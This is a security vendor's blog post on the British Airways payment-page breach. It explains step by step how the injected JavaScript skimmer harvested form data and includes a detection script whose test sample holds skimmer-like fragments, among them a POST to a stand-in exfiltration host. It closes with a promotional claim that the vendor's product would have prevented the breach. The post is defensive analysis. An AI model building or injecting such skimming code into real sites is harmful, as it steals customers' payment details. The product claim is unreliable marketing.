British Airways Falls Prey to Latest Attack Technique: Friendly Site Malicious JavaScript Attack


Trevor Reschke, Head of Threat Intelligence

Last Thursday, another major breach hit the news, as British Airways announced that its website and mobile application had been compromised by criminals, resulting in the theft of the details of 380,000 customer transactions.

The airline discovered that bookings made between August 21 and September 5 had been infiltrated in a “very sophisticated, malicious criminal attack”, with cyber-criminals obtaining names, street names, email addresses, credit card numbers, expiry dates and even security codes. BA reports that only customers who booked travel and made purchases on the BA site or mobile application within that time window were affected by the breach. Thankfully, stored credit card details are not at risk.

The following Tuesday, cyber security company RiskIQ announced that it had uncovered the malicious JavaScript code injected onto the British Airways website. The skimming script consisted of just 22 lines of obfuscated JavaScript, customized specifically for BA’s website. The malware grabbed data from the payment forms and sent it to the criminals’ servers once the customer had submitted it to the BA website.

This type of JavaScript-based malware attack has recently been on the rise. For example, earlier this year there was a string of attacks on sites running unpatched, open-source versions of the Magento shopping cart. After compromise, attackers embedded credential and payment theft malware within the legitimate Magento JavaScript files.


Why is this Type of Attack Getting More Popular?

This technique makes collecting stolen data simpler, since the theft occurs on the user’s side and the data is pushed to the criminals’ command and control center as it is collected. It also makes detection harder: the site itself is trusted, and content delivered from mainstream websites is usually trusted too – especially from sites responsible for air travel. Traditionally, criminals have targeted databases or the internal network traffic behind the website to collect user financial data, but those assets are usually highly defended. Further, compromising a database gives an attacker access to some data of value, but often not data of financial value: credit card numbers are usually encrypted, and track data and CVV codes are rarely stored at all. By intercepting payment details at the time of use, as this technique does, the criminals gain full access to this highly valuable data. One major drawback of this attack technique: if the user had previously stored their financial details with the site, they would not be prompted to re-enter them, and those details would therefore not have been stolen by the JavaScript-based malware.

Previously, this data would only have been accessible through endpoint malware infection. However, it’s more advantageous for criminals to compromise servers that can distribute this type of malicious code for them, rather than infect individual endpoints. While servers generally require greater effort to hack than your typical home user’s computer, such intrusions pay far larger dividends because, once compromised, a centralized server can distribute malware to every user of a site.

Furthermore, the barrier to entry for orchestrating a JavaScript-based malware attack isn’t as high as one might think. The attackers don’t have to compromise the British Airways website itself – which would be far more difficult – they only need to compromise one of the many third-party applications British Airways uses on its website.

Modern websites make use of scores – often hundreds – of third-party libraries, and each vulnerability is essentially a hole that can be exploited to expose the website in its entirety. Once the attackers have infiltrated systems controlling third-party libraries they can insert site-specific malware into files containing the functionality BA’s site uses. It’s not so much a trojan horse as a subversion of legitimate functionality. Once the malicious code is merged into the legitimate code it will be served to every visitor of the infected site.


How Exactly Does the Malware Work?

  1. The current page’s URL is scanned to see if it matches a list of known, interesting patterns, e.g. “order” or “checkout”.
  2. Every button, input, form, and submit element in the DOM is enumerated.
  3. For each of these elements it registers a new event handler. Depending on the element type, different event hooks are registered (e.g. the submit event handler is registered for form elements). However, the event handler function is the same regardless of the event.
  4. Every 30 seconds this event registration is executed again.
  5. The event handler, when triggered, creates a URL parameter string from all inputs on the page. This string is then sent as parameters of a POST request to an exfiltration site.
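The five behaviours above are generic enough to serve as review indicators. As an added example (not code from the original post or from RiskIQ’s analysis), the following Node.js script maps each step onto a textual indicator, scores a JavaScript file on how many it exhibits, and additionally flags any POST target that is not one of the site’s own hosts. The indicator list, the weights, the threshold, both sample inputs and the host names are constructed for this example.

```javascript
// Added example, not code from the original post or from RiskIQ's analysis: a
// static heuristic scanner that maps the five behaviours described above onto
// textual indicators and scores a JavaScript file on how many it exhibits.
// Indicators, weights, samples and host names are constructed for this example.

const INDICATORS = [
  // 1. URL checked against "interesting" patterns such as order/checkout
  { id: 'url-check',  weight: 1, re: /location\.(href|pathname)[^\n]{0,60}(checkout|order|payment|billing)/i },
  // 2. Every input/button/form element enumerated
  { id: 'dom-sweep',  weight: 1, re: /(getElementsByTagName|querySelectorAll)\s*\(\s*["'](input|button|form|select)/i },
  // 3. Event handlers attached to those elements
  { id: 'event-hook', weight: 1, re: /addEventListener\s*\(\s*["'](submit|click|mouseup|touchend|keydown)/i },
  // 4. Registration repeated on a timer
  { id: 're-hook',    weight: 1, re: /setInterval\s*\(/ },
  // 5. Collected fields POSTed to an absolute URL
  { id: 'post-exfil', weight: 2, re: /\.open\s*\(\s*["']POST["']\s*,\s*["']https?:\/\//i },
];

// Every absolute URL in the source whose host is not one the site legitimately uses.
function foreignHosts(source, firstPartyHosts) {
  const urls = source.match(/https?:\/\/[A-Za-z0-9.-]+(?::\d+)?(?:\/[^\s"')]*)?/g) || [];
  const hosts = urls.map(u => new URL(u).hostname);
  return [...new Set(hosts.filter(h => !firstPartyHosts.includes(h)))];
}

function scanScript(source, firstPartyHosts, threshold = 4) {
  const hits = INDICATORS.filter(i => i.re.test(source));
  const foreign = foreignHosts(source, firstPartyHosts);
  let score = hits.reduce((sum, i) => sum + i.weight, 0);
  // A POST whose target is not one of our own hosts is the strongest single signal.
  if (foreign.length > 0 && hits.some(i => i.id === 'post-exfil')) score += 2;
  return { hits: hits.map(i => i.id), foreignHosts: foreign, score, suspicious: score >= threshold };
}

// Constructed sample 1: isolated fragments showing the indicators (not a working script).
const SUSPICIOUS_SAMPLE = `
if (window.location.href.indexOf("checkout") !== -1) { init(); }
var els = document.querySelectorAll("input, button, form");
for (var i = 0; i < els.length; i++) els[i].addEventListener("mouseup", handler);
setInterval(init, 30000);
req.open("POST", "https://exfil.invalid/gate", true);
`;

// Constructed sample 2: ordinary client-side form validation. It also touches
// forms and submit events, but never sends anything anywhere.
const BENIGN_SAMPLE = `
document.querySelectorAll("form").forEach(function (f) { f.addEventListener("submit", validate); });
function validate(e) { if (!e.target.checkValidity()) e.preventDefault(); }
`;

// Placeholder first-party hosts for the site being reviewed.
const FIRST_PARTY = ['www.example-airline.test', 'api.example-airline.test'];

console.log(scanScript(SUSPICIOUS_SAMPLE, FIRST_PARTY));  // score 8, suspicious
console.log(scanScript(BENIGN_SAMPLE, FIRST_PARTY));      // score 2, not suspicious
```

Run it over every script the payment page loads, including third-party libraries after each update. The scanner is a triage aid only: obfuscation or string splitting defeats pattern matching, which is exactly the limitation the next section describes, so a hit should start a human review rather than end one.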


How Can You Protect Against These Types of Attack?

To date, the security community and businesses have not had the tools to address these types of attacks automatically. Defense has relied on detecting changes in the third-party libraries and actively reviewing those changes. Even so, this has little effect if the code is new (as with zero-day attacks) or, as in this case, carefully customized to the BA website to avoid detection. In addition, this is a time-consuming and error-prone manual approach, particularly with minified JavaScript.

Ultimately, this approach on its own is flawed, but businesses have another way to protect their payment pages. Rather than relying completely on the detection of malicious code, businesses can turn the issue on its head by stopping payment information from leaving the site. This means that, whatever the method of attack, the culprits are thwarted and customer data is protected – which is the ideal outcome. In today’s digital era, it is not possible to stop all online customers from being attacked, but if the transaction session can be protected, the fraudulent activity can be prevented.

Trusted Knight’s Protector Air does precisely that – it’s a cloud-based solution that is invisible to the end users and stops transactional fraud by securing the transaction stack and therefore ensuring the integrity of every transaction.

Trusted Knight’s patented Protector Air technology would have prevented the BA data loss. Other solutions should detect changes to the payment page and should have sent alerts indicating those changes, but the alerts would then have had to be reviewed and acted upon by already overworked security teams, and would still have been addressed only after the fact, once a breach had taken place. Had Protector Air been in place, this breach would have been automatically prevented, no customer details would have gotten into the hands of criminals, and BA would have saved tens of millions of dollars in hard costs as well as untold losses in brand reputation.